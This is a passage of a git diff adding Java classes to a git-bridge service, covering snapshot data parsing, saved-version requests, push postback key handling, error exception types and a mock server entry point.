atts = new ArrayList<>(); + fromJSON(json); + } + + public SnapshotData(List<SnapshotFile> srcs, List<SnapshotAttachment> atts) { + this.srcs = srcs; + this.atts = atts; + } + + @Override + public String toString() { + return "SnapshotData(srcs: " + srcs + ", atts: " + atts + ")"; + } + + public JsonElement toJson() { + JsonObject jsonThis = new JsonObject(); + JsonArray jsonSrcs = new JsonArray(); + for (SnapshotFile src : srcs) { + jsonSrcs.add(src.toJson()); + } + jsonThis.add("srcs", jsonSrcs); + JsonArray jsonAtts = new JsonArray(); + for (SnapshotAttachment att : atts) { + jsonAtts.add(att.toJson()); + } + jsonThis.add("atts", jsonAtts); + return jsonThis; + } + + @Override + public void fromJSON(JsonElement json) { + populateSrcs(json.getAsJsonObject().get(JSON_KEY_SRCS).getAsJsonArray()); + populateAtts(json.getAsJsonObject().get(JSON_KEY_ATTS).getAsJsonArray()); + } + + private void populateSrcs(JsonArray jsonArray) { + for (JsonElement json : jsonArray) { + srcs.add(new SnapshotFile(json)); + } + } + + private void populateAtts(JsonArray jsonArray) { + for (JsonElement json : jsonArray) { + atts.add(new SnapshotAttachment(json)); + } + } + + public List<SnapshotFile> getSrcs() { + return srcs; + } + + public List<SnapshotAttachment> getAtts() { + return atts; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/SnapshotFile.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/SnapshotFile.java new file mode 100644 index 0000000..e7f55f8 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/SnapshotFile.java @@ -0,0 +1,65 @@ +package uk.ac.ic.wlgitbridge.snapshot.getforversion; + +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonPrimitive; +import uk.ac.ic.wlgitbridge.data.filestore.RawFile; +import uk.ac.ic.wlgitbridge.snapshot.base.JSONSource; + +/* + * Created by Winston on 06/11/14. + */ +public class SnapshotFile extends RawFile implements JSONSource { + + private String path; + private byte[] contents; + + public SnapshotFile(JsonElement json) { + fromJSON(json); + } + + @Override + public String toString() { + return "SnapshotFile(path: " + path + ", contents: byte[" + contents.length + "])"; + } + + @Override + public void fromJSON(JsonElement json) { + JsonArray jsonArray = json.getAsJsonArray(); + contents = jsonArray.get(0).getAsString().getBytes(); + path = jsonArray.get(1).getAsString(); + } + + @Override + public String getPath() { + return path; + } + + @Override + public byte[] getContents() { + return contents; + } + + @Override + public long size() { + return contents.length; + } + + /* Mock server */ + + public SnapshotFile(String contents, String path) { + this.path = path; + if (contents != null) { + this.contents = contents.getBytes(); + } else { + this.contents = new byte[0]; + } + } + + public JsonElement toJson() { + JsonArray jsonThis = new JsonArray(); + jsonThis.add(new JsonPrimitive(new String(contents))); + jsonThis.add(new JsonPrimitive(path)); + return jsonThis; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/GetSavedVersRequest.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/GetSavedVersRequest.java new file mode 100644 index 0000000..d2d07aa --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/GetSavedVersRequest.java @@ -0,0 +1,31 @@ +package uk.ac.ic.wlgitbridge.snapshot.getsavedvers; + +import com.google.api.client.auth.oauth2.Credential; +import com.google.gson.JsonElement; +import uk.ac.ic.wlgitbridge.snapshot.base.HTTPMethod; +import uk.ac.ic.wlgitbridge.snapshot.base.SnapshotAPIRequest; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 06/11/14. + */ +public class GetSavedVersRequest extends SnapshotAPIRequest<GetSavedVersResult> { + + public static final String API_CALL = "/saved_vers"; + + public GetSavedVersRequest(Credential oauth2, String projectName) { + super(projectName, API_CALL, oauth2); + Log.debug("GetSavedVersRequest({}, {})", "oauth2: <oauth2>", "projectName: " + projectName); + } + + @Override + protected HTTPMethod httpMethod() { + return HTTPMethod.GET; + } + + @Override + protected GetSavedVersResult parseResponse(JsonElement json) throws FailedConnectionException { + return new GetSavedVersResult(this, json); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/GetSavedVersResult.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/GetSavedVersResult.java new file mode 100644 index 0000000..0710061 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/GetSavedVersResult.java @@ -0,0 +1,59 @@ +package uk.ac.ic.wlgitbridge.snapshot.getsavedvers; + +import com.google.gson.Gson; +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.util.ArrayList; +import java.util.List; +import uk.ac.ic.wlgitbridge.snapshot.base.Request; +import uk.ac.ic.wlgitbridge.snapshot.base.Result; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 06/11/14. + */ +public class GetSavedVersResult extends Result { + + private List<SnapshotInfo> savedVers; + + public GetSavedVersResult(Request request, JsonElement json) throws FailedConnectionException { + super(request, json); + } + + public GetSavedVersResult(List<SnapshotInfo> savedVers) { + this.savedVers = savedVers; + } + + @Override + public JsonElement toJson() { + JsonArray jsonThis = new JsonArray(); + for (SnapshotInfo savedVer : savedVers) { + JsonObject jsonSavedVer = new JsonObject(); + jsonSavedVer.addProperty("versionId", savedVer.getVersionId()); + jsonSavedVer.addProperty("comment", savedVer.getComment()); + WLUser user = savedVer.getUser(); + JsonObject jsonUser = new JsonObject(); + jsonUser.addProperty("email", user.getEmail()); + jsonUser.addProperty("name", user.getName()); + jsonSavedVer.add("user", jsonUser); + jsonSavedVer.addProperty("createdAt", savedVer.getCreatedAt()); + jsonThis.add(jsonSavedVer); + } + return jsonThis; + } + + @Override + public void fromJSON(JsonElement json) { + Log.debug("GetSavedVersResult({})", json); + savedVers = new ArrayList<>(); + for (JsonElement elem : json.getAsJsonArray()) { + savedVers.add(new Gson().fromJson(elem.getAsJsonObject(), SnapshotInfo.class)); + } + } + + public List<SnapshotInfo> getSavedVers() { + return savedVers; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/SnapshotInfo.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/SnapshotInfo.java new file mode 100644 index 0000000..8818aa8 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/SnapshotInfo.java @@ -0,0 +1,55 @@ +package uk.ac.ic.wlgitbridge.snapshot.getsavedvers; + +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 06/11/14. + */ +public class SnapshotInfo implements Comparable<SnapshotInfo> { + + private int versionId; + private String comment; + private WLUser user; + private String createdAt; + + public SnapshotInfo(int versionID, String createdAt, String name, String email) { + this(versionID, "Update on " + Util.getServiceName() + ".", email, name, createdAt); + } + + public SnapshotInfo(int versionID, String comment, String email, String name, String createdAt) { + versionId = versionID; + this.comment = comment; + user = new WLUser(name, email); + this.createdAt = createdAt; + } + + public int getVersionId() { + return versionId; + } + + public String getComment() { + return comment; + } + + public WLUser getUser() { + return user != null ? user : new WLUser(); + } + + public String getCreatedAt() { + return createdAt; + } + + @Override + public boolean equals(Object obj) { + if (!(obj instanceof SnapshotInfo)) { + return false; + } + SnapshotInfo that = (SnapshotInfo) obj; + return versionId == that.versionId; + } + + @Override + public int compareTo(SnapshotInfo o) { + return Integer.compare(versionId, o.versionId); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/WLUser.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/WLUser.java new file mode 100644 index 0000000..61867f9 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/WLUser.java @@ -0,0 +1,39 @@ +package uk.ac.ic.wlgitbridge.snapshot.getsavedvers; + +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 06/11/14. + */ +public class WLUser { + + private final String name; + private final String email; + + public WLUser() { + this(null, null); + } + + public WLUser(String name, String email) { + if (name != null && email != null) { + this.name = name; + this.email = email; + } else { + this.name = "Anonymous"; + this.email = "anonymous@" + Util.getServiceName().toLowerCase() + ".com"; + } + } + + public String getName() { + return name; + } + + public String getEmail() { + return email; + } + + @Override + public String toString() { + return "(" + name + ", " + email + ")"; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PostbackManager.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PostbackManager.java new file mode 100644 index 0000000..2b15b61 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PostbackManager.java @@ -0,0 +1,81 @@ +package uk.ac.ic.wlgitbridge.snapshot.push; + +import com.google.common.base.Preconditions; +import java.math.BigInteger; +import java.security.SecureRandom; +import java.util.Collections; +import java.util.HashMap; +import java.util.Map; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.InvalidPostbackKeyException; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.SnapshotPostException; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.UnexpectedPostbackException; + +/* + * Created by Winston on 17/11/14. + */ +public class PostbackManager { + + private final SecureRandom random; + final Map<String, PostbackPromise> postbackContentsTable; + + PostbackManager(SecureRandom random) { + this.random = random; + postbackContentsTable = Collections.synchronizedMap(new HashMap<String, PostbackPromise>()); + } + + public PostbackManager() { + this(new SecureRandom()); + } + + public int waitForVersionIdOrThrow(String projectName) throws SnapshotPostException { + try { + PostbackPromise postbackPromise = postbackContentsTable.get(projectName); + Preconditions.checkNotNull(postbackPromise); + return postbackPromise.waitForPostback(); + } finally { + postbackContentsTable.remove(projectName); + } + } + + public void postVersionIDForProject(String projectName, int versionID, String postbackKey) + throws UnexpectedPostbackException { + getPostbackForProject(projectName).receivedVersionID(versionID, postbackKey); + } + + public void postExceptionForProject( + String projectName, SnapshotPostException exception, String postbackKey) + throws UnexpectedPostbackException { + getPostbackForProject(projectName).receivedException(exception, postbackKey); + } + + private PostbackPromise getPostbackForProject(String projectName) + throws UnexpectedPostbackException { + PostbackPromise contents = postbackContentsTable.get(projectName); + if (contents == null) { + throw new UnexpectedPostbackException(); + } + return contents; + } + + public String makeKeyForProject(String projectName) { + String key = System.currentTimeMillis() + randomString(); + PostbackPromise contents = new PostbackPromise(key); + postbackContentsTable.put(projectName, contents); + return key; + } + + public void checkPostbackKey(String projectName, String postbackKey) + throws InvalidPostbackKeyException { + PostbackPromise postbackPromise = postbackContentsTable.get(projectName); + if (postbackPromise == null) { + // project not found; can't check key + throw new InvalidPostbackKeyException(); + } else { + postbackPromise.checkPostbackKey(postbackKey); + } + } + + private String randomString() { + return new BigInteger(130, random).toString(32); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PostbackPromise.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PostbackPromise.java new file mode 100644 index 0000000..f8b55d3 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PostbackPromise.java @@ -0,0 +1,86 @@ +package uk.ac.ic.wlgitbridge.snapshot.push; + +import java.util.concurrent.TimeUnit; +import java.util.concurrent.locks.Condition; +import java.util.concurrent.locks.ReentrantLock; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.InternalErrorException; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.InvalidPostbackKeyException; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.PostbackTimeoutException; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.SnapshotPostException; + +/* + * Created by Winston on 17/11/14. + */ +public class PostbackPromise { + + private static int TIMEOUT_SECONDS = 60 * 6; + + private final String postbackKey; + private final ReentrantLock lock; + private final Condition cond; + + private boolean received; + private int versionID; + private SnapshotPostException exception; + + public PostbackPromise(String postbackKey) { + this.postbackKey = postbackKey; + lock = new ReentrantLock(); + cond = lock.newCondition(); + received = false; + exception = null; + } + + public int waitForPostback() throws SnapshotPostException { + lock.lock(); + try { + while (!received) { + try { + if (!cond.await(TIMEOUT_SECONDS, TimeUnit.SECONDS)) { + throw new PostbackTimeoutException(TIMEOUT_SECONDS); + } + } catch (InterruptedException e) { + throw new InternalErrorException(); + } + } + if (exception != null) { + throw exception; + } + return versionID; + } finally { + lock.unlock(); + } + } + + public void receivedVersionID(int versionID, String postbackKey) { + lock.lock(); + try { + if (postbackKey.equals(this.postbackKey)) { + this.versionID = versionID; + received = true; + cond.signalAll(); + } + } finally { + lock.unlock(); + } + } + + public void receivedException(SnapshotPostException exception, String postbackKey) { + lock.lock(); + try { + if (postbackKey.equals(this.postbackKey)) { + this.exception = exception; + received = true; + cond.signalAll(); + } + } finally { + lock.unlock(); + } + } + + public void checkPostbackKey(String postbackKey) throws InvalidPostbackKeyException { + if (!postbackKey.equals(this.postbackKey)) { + throw new InvalidPostbackKeyException(); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PushRequest.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PushRequest.java new file mode 100644 index 0000000..a54f7c0 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PushRequest.java @@ -0,0 +1,46 @@ +package uk.ac.ic.wlgitbridge.snapshot.push; + +import com.google.api.client.auth.oauth2.Credential; +import com.google.gson.JsonElement; +import uk.ac.ic.wlgitbridge.data.CandidateSnapshot; +import uk.ac.ic.wlgitbridge.snapshot.base.HTTPMethod; +import uk.ac.ic.wlgitbridge.snapshot.base.SnapshotAPIRequest; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 16/11/14. + */ +public class PushRequest extends SnapshotAPIRequest<PushResult> { + + private static final String API_CALL = "/snapshots"; + + private final CandidateSnapshot candidateSnapshot; + private final String postbackKey; + + public PushRequest(Credential oauth2, CandidateSnapshot candidateSnapshot, String postbackKey) { + super(candidateSnapshot.getProjectName(), API_CALL, oauth2); + this.candidateSnapshot = candidateSnapshot; + this.postbackKey = postbackKey; + Log.debug( + "PushRequest({}, {}, {})", + "oauth2: <oauth2>", + "candidateSnapshot: " + candidateSnapshot, + "postbackKey: " + postbackKey); + } + + @Override + protected HTTPMethod httpMethod() { + return HTTPMethod.POST; + } + + @Override + protected String getPostBody() { + return candidateSnapshot.getJsonRepresentation(postbackKey).toString(); + } + + @Override + protected PushResult parseResponse(JsonElement json) throws FailedConnectionException { + return new PushResult(this, json); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PushResult.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PushResult.java new file mode 100644 index 0000000..d35a724 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PushResult.java @@ -0,0 +1,45 @@ +package uk.ac.ic.wlgitbridge.snapshot.push; + +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import uk.ac.ic.wlgitbridge.snapshot.base.Request; +import uk.ac.ic.wlgitbridge.snapshot.base.Result; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.util.Log; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 16/11/14. + */ +public class PushResult extends Result { + + private boolean success; + + public PushResult(Request request, JsonElement json) throws FailedConnectionException { + super(request, json); + } + + @Override + public JsonElement toJson() { + return null; + } + + public boolean wasSuccessful() { + return success; + } + + @Override + public void fromJSON(JsonElement json) { + Log.debug("PushResult({})", json); + JsonObject responseObject = json.getAsJsonObject(); + String code = Util.getCodeFromResponse(responseObject); + + if (code.equals("accepted")) { + success = true; + } else if (code.equals("outOfDate")) { + success = false; + } else { + throw new RuntimeException(); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InternalErrorException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InternalErrorException.java new file mode 100644 index 0000000..0627707 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InternalErrorException.java @@ -0,0 +1,27 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +import com.google.gson.JsonElement; +import java.util.Arrays; +import java.util.List; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 09/01/15. + */ +public class InternalErrorException extends SevereSnapshotPostException { + + @Override + public String getMessage() { + return "internal error"; + } + + @Override + public List<String> getDescriptionLines() { + return Arrays.asList( + "There was an internal error with the Git server.", + "Please contact " + Util.getServiceName() + "."); + } + + @Override + public void fromJSON(JsonElement json) {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InvalidFilesException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InvalidFilesException.java new file mode 100644 index 0000000..739c0e5 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InvalidFilesException.java @@ -0,0 +1,69 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.util.ArrayList; +import java.util.List; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 16/11/14. + */ +public class InvalidFilesException extends SnapshotPostException { + + private List<String> descriptionLines; + + public InvalidFilesException(JsonObject json) { + super(json); + } + + @Override + public String getMessage() { + return "invalid files"; + } + + @Override + public List<String> getDescriptionLines() { + return descriptionLines; + } + + @Override + public void fromJSON(JsonElement json) { + descriptionLines = new ArrayList<>(); + JsonArray errors = json.getAsJsonObject().get("errors").getAsJsonArray(); + descriptionLines.add( + "You have " + + errors.size() + + " invalid files in your " + + Util.getServiceName() + + " project:"); + for (JsonElement error : errors) { + descriptionLines.add(describeError(error.getAsJsonObject())); + } + } + + private String describeError(JsonObject jsonObject) { + return jsonObject.get("file").getAsString() + " (" + describeFile(jsonObject) + ")"; + } + + private String describeFile(JsonObject file) { + if (file.has("cleanFile")) { + return describeCleanFile(file.get("cleanFile").getAsString()); + } else { + return describeErrorState(file.get("state").getAsString()); + } + } + + private String describeCleanFile(String cleanFile) { + return "rename to: " + cleanFile; + } + + private String describeErrorState(String state) { + if (state.equals("disallowed")) { + return "invalid file extension"; + } else { + return "error"; + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InvalidPostbackKeyException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InvalidPostbackKeyException.java new file mode 100644 index 0000000..6fdf8ab --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InvalidPostbackKeyException.java @@ -0,0 +1,6 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +/* + * Created by Winston on 04/12/14. + */ +public class InvalidPostbackKeyException extends Exception {} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InvalidProjectException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InvalidProjectException.java new file mode 100644 index 0000000..093d01e --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InvalidProjectException.java @@ -0,0 +1,37 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import java.util.LinkedList; +import java.util.List; + +/* + * Created by Winston on 16/11/14. + */ +public class InvalidProjectException extends SnapshotPostException { + + private LinkedList<String> descriptionLines; + + public InvalidProjectException(JsonElement jsonElement) { + super(jsonElement); + } + + @Override + public String getMessage() { + return "invalid project"; + } + + @Override + public List<String> getDescriptionLines() { + return descriptionLines; + } + + @Override + public void fromJSON(JsonElement json) { + descriptionLines = new LinkedList<String>(); + JsonArray errors = json.getAsJsonObject().get("errors").getAsJsonArray(); + for (JsonElement error : errors) { + descriptionLines.add(error.getAsString()); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/OutOfDateException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/OutOfDateException.java new file mode 100644 index 0000000..c3a96d9 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/OutOfDateException.java @@ -0,0 +1,31 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.util.Arrays; +import java.util.List; + +/* + * Created by Winston on 16/11/14. + */ +public class OutOfDateException extends SnapshotPostException { + + public OutOfDateException(JsonObject json) { + super(json); + } + + public OutOfDateException() {} + + @Override + public String getMessage() { + return "out of date"; + } + + @Override + public List<String> getDescriptionLines() { + return Arrays.asList("out of date (shouldn't print this)"); + } + + @Override + public void fromJSON(JsonElement json) {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/PostbackTimeoutException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/PostbackTimeoutException.java new file mode 100644 index 0000000..4ae2d02 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/PostbackTimeoutException.java @@ -0,0 +1,33 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +import com.google.gson.JsonElement; +import java.util.Arrays; +import java.util.List; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 09/01/15. + */ +public class PostbackTimeoutException extends SevereSnapshotPostException { + + private int timeout; + + public PostbackTimeoutException(int timeout) { + this.timeout = timeout; + } + + @Override + public String getMessage() { + return "Request timed out (after " + this.timeout + " seconds)"; + } + + @Override + public List<String> getDescriptionLines() { + return Arrays.asList( + "The " + Util.getServiceName() + " server is currently unavailable.", + "Please try again later."); + } + + @Override + public void fromJSON(JsonElement json) {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/SevereSnapshotPostException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/SevereSnapshotPostException.java new file mode 100644 index 0000000..de3141b --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/SevereSnapshotPostException.java @@ -0,0 +1,17 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +import com.google.gson.JsonElement; + +/* + * Created by Winston on 10/01/15. + */ +public abstract class SevereSnapshotPostException extends SnapshotPostException { + + public SevereSnapshotPostException() { + super(); + } + + public SevereSnapshotPostException(JsonElement json) { + super(json); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/SnapshotPostException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/SnapshotPostException.java new file mode 100644 index 0000000..1b32825 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/SnapshotPostException.java @@ -0,0 +1,16 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +import com.google.gson.JsonElement; +import uk.ac.ic.wlgitbridge.git.exception.SnapshotAPIException; + +/* + * Created by Winston on 16/11/14. + */ +public abstract class SnapshotPostException extends SnapshotAPIException { + + public SnapshotPostException() {} + + public SnapshotPostException(JsonElement jsonElement) { + fromJSON(jsonElement); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/SnapshotPostExceptionBuilder.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/SnapshotPostExceptionBuilder.java new file mode 100644 index 0000000..7737959 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/SnapshotPostExceptionBuilder.java @@ -0,0 +1,29 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +import com.google.gson.JsonObject; + +/* + * Created by Winston on 17/11/14. + */ +public class SnapshotPostExceptionBuilder { + + private static final String CODE_ERROR_OUT_OF_DATE = "outOfDate"; + private static final String CODE_ERROR_INVALID_FILES = "invalidFiles"; + private static final String CODE_ERROR_INVALID_PROJECT = "invalidProject"; + private static final String CODE_ERROR_UNKNOWN = "error"; + + public SnapshotPostException build(String errorCode, JsonObject json) + throws UnexpectedPostbackException { + if (errorCode.equals(CODE_ERROR_OUT_OF_DATE)) { + return new OutOfDateException(json); + } else if (errorCode.equals(CODE_ERROR_INVALID_FILES)) { + return new InvalidFilesException(json); + } else if (errorCode.equals(CODE_ERROR_INVALID_PROJECT)) { + return new InvalidProjectException(json); + } else if (errorCode.equals(CODE_ERROR_UNKNOWN)) { + return new UnexpectedErrorException(json); + } else { + throw new UnexpectedPostbackException(); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/UnexpectedErrorException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/UnexpectedErrorException.java new file mode 100644 index 0000000..f1542d5 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/UnexpectedErrorException.java @@ -0,0 +1,35 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.util.Arrays; +import java.util.List; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 16/11/14. + */ +public class UnexpectedErrorException extends SevereSnapshotPostException { + + private static final String[] DESCRIPTION_LINES = { + "There was an internal error with the " + Util.getServiceName() + " server.", + "Please contact " + Util.getServiceName() + "." + }; + + public UnexpectedErrorException(JsonObject json) { + super(json); + } + + @Override + public String getMessage() { + return Util.getServiceName() + " error"; + } + + @Override + public List<String> getDescriptionLines() { + return Arrays.asList(DESCRIPTION_LINES); + } + + @Override + public void fromJSON(JsonElement json) {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/UnexpectedPostbackException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/UnexpectedPostbackException.java new file mode 100644 index 0000000..27322f2 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/UnexpectedPostbackException.java @@ -0,0 +1,6 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +/* + * Created by Winston on 17/11/14. + */ +public class UnexpectedPostbackException extends Exception {} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/Main.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/Main.java new file mode 100644 index 0000000..450d014 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/Main.java @@ -0,0 +1,22 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock; + +import java.io.File; +import java.io.FileInputStream; +import java.io.FileNotFoundException; +import uk.ac.ic.wlgitbridge.snapshot.servermock.server.MockSnapshotServer; +import uk.ac.ic.wlgitbridge.snapshot.servermock.state.SnapshotAPIStateBuilder; + +/* + * Created by Winston on 10/01/15. + */ +public class Main { + + public static void main(String[] args) throws FileNotFoundException { + MockSnapshotServer server = + new MockSnapshotServer(60000, new File("/Users/Roxy/Code/java/writelatex-git-bridge")); + server.setState( + new SnapshotAPIStateBuilder(new FileInputStream(new File("/Users/Roxy/Desktop/state.json"))) + .build()); + server.start(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/exception/InvalidAPICallException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/exception/InvalidAPICallException.java new file mode 100644 index 0000000..af303be --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/exception/InvalidAPICallException.java @@ -0,0 +1,11 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.exception; + +/* + * Created by Winston on 09/01/15. + */ +public class InvalidAPICallException extends Exception { + + public InvalidAPICallException(String target) { + super(target); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/SnapshotResponse.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/SnapshotResponse.java new file mode 100644 index 0000000..2ffbefd --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/SnapshotResponse.java @@ -0,0 +1,13 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response; + +/* + * Created by Winston on 09/01/15. + */ +public abstract class SnapshotResponse { + + public abstract String respond(); + + public String postback() { + return null; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/SnapshotResponseBuilder.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/SnapshotResponseBuilder.java 